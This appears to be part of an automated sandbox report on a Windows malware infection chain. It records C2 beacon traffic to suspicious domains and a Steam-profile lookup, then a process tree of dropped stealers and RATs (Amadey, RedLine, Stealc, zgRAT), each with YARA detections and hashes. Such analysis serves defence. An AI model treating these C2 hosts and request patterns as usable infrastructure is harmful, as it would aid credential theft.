2024-09-27 02:21:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49780	172.67.208.139	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:48 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-27 02:21:48 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:48 UTC	768	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pb3s5ln241mje21j1epn8lduii; expires=Mon, 20 Jan 2025 20:08:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Si%2BHJn3COZ8nroE62%2BmghbjxY37pZCRAJAK2g0UoMc%2BfH9dZ0a1R%2Bm48y61FQ7k9jXQ66xhLuF6KSOyd2lpcmMCetRAdhHqQOyEEjWDI7Hv5aWuyAPcCBxXra3lqq2aX6IGd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9805baab3e7c84-EWR
2024-09-27 02:21:48 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49783	104.102.49.254	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:49 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-27 02:21:50 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 27 Sep 2024 02:21:50 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=34544383b789930c74fb87f0; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-27 02:21:50 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-27 02:21:50 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-27 02:21:50 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49786	104.21.2.13	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:50 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-27 02:21:50 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:51 UTC	774	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gni7esgijqsck5juvef4203tv4; expires=Mon, 20 Jan 2025 20:08:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NOeKYOokIexJUaxQHbaAsnfErhHUYw%2FGYn7qLGqZChAJPpfOttDXr6rVn3mUGAvnVxqNWlg8RelYrTj5Quq%2Bv%2BJS%2BMurH8mmxJcbuBH79IHgU5%2F8vr5TB263LYqT0Hz6XA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9805c9ec684337-EWR
2024-09-27 02:21:51 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	22:19:59
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xd70000
File size:	1'973'760 bytes
MD5 hash:	49A9681922AD571A4A24B42465E5CDC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2100199009.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2059876359.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:20:02
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x6d0000
File size:	1'973'760 bytes
MD5 hash:	49A9681922AD571A4A24B42465E5CDC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2092244359.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2132657383.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:20:02
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x6d0000
File size:	1'973'760 bytes
MD5 hash:	49A9681922AD571A4A24B42465E5CDC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2137528658.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2097277338.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:21:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x6d0000
File size:	1'973'760 bytes
MD5 hash:	49A9681922AD571A4A24B42465E5CDC4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2660197463.0000000005270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	22:21:04
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"
Imagebase:	0x320000
File size:	320'000 bytes
MD5 hash:	389881B424CF4D7EC66DE13F01C7232A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:21:04
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:21:04
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xfa0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.2858375876.0000000000421000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:21:07
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"
Imagebase:	0xc30000
File size:	903'168 bytes
MD5 hash:	84263AB03B0A0F2B51CC11B93EC49C9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:21:07
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:21:08
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf00000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:21:09
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe"
Imagebase:	0xeb0000
File size:	364'544 bytes
MD5 hash:	A3EF9920A91B891837705E46BB26DE17
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:21:09
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe"
Imagebase:	0x980000
File size:	311'296 bytes
MD5 hash:	4E60F3FD76D9EAB244F9DC00F7765B0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000000.2743413238.0000000000982000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:21:10
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Imagebase:	0x190000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000000.2751757055.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:21:11
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Imagebase:	0x210000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000000.2765127201.0000000000211000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000002.2769327231.0000000000211000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:21:12
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Imagebase:	0x210000
File size:	425'984 bytes
MD5 hash:	F5D7B79EE6B6DA6B50E536030BCC3B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.2770476347.0000000000211000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.3331845995.0000000000211000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	22:21:12
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0xf50000
File size:	192'000 bytes
MD5 hash:	7A02AA17200AEAC25A375F290A4B4C95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000000.2774274390.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.2996521135.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:21:17
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000065001\stories.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
Imagebase:	0x400000
File size:	3'247'089 bytes
MD5 hash:	BB4417D907E43503F714273F1AE9CF44
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	22:21:18
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp" /SL5="$8045C,2980754,56832,C:\Users\user\AppData\Local\Temp\1000065001\stories.exe"
Imagebase:	0x400000
File size:	708'608 bytes
MD5 hash:	C8AFA039FC2A7F032512686FB50692DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	22:21:18
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
Imagebase:	0x400000
File size:	4'278'784 bytes
MD5 hash:	7FA5C660D124162C405984D14042506F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000016.00000002.2960319681.0000000003119000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.2972396756.0000000003740000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:21:20
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe" -i
Imagebase:	0x400000
File size:	3'117'056 bytes
MD5 hash:	B19555358F3C9ABC6157B2B7AAB2F658
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000017.00000002.3340691563.000000000279D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	22:21:21
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000254001\penis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
Imagebase:	0xca0000
File size:	419'328 bytes
MD5 hash:	A21700718C70EC5E787AD373CB72A757
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000000.2860928710.0000000000CA2000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:21:21
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:21:22
Start date:	26/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	22:21:24
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
Imagebase:	0x7c0000
File size:	321'536 bytes
MD5 hash:	FF5AFED0A8B802D74AF1C1422C720446
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:21:24
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	22:21:26
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
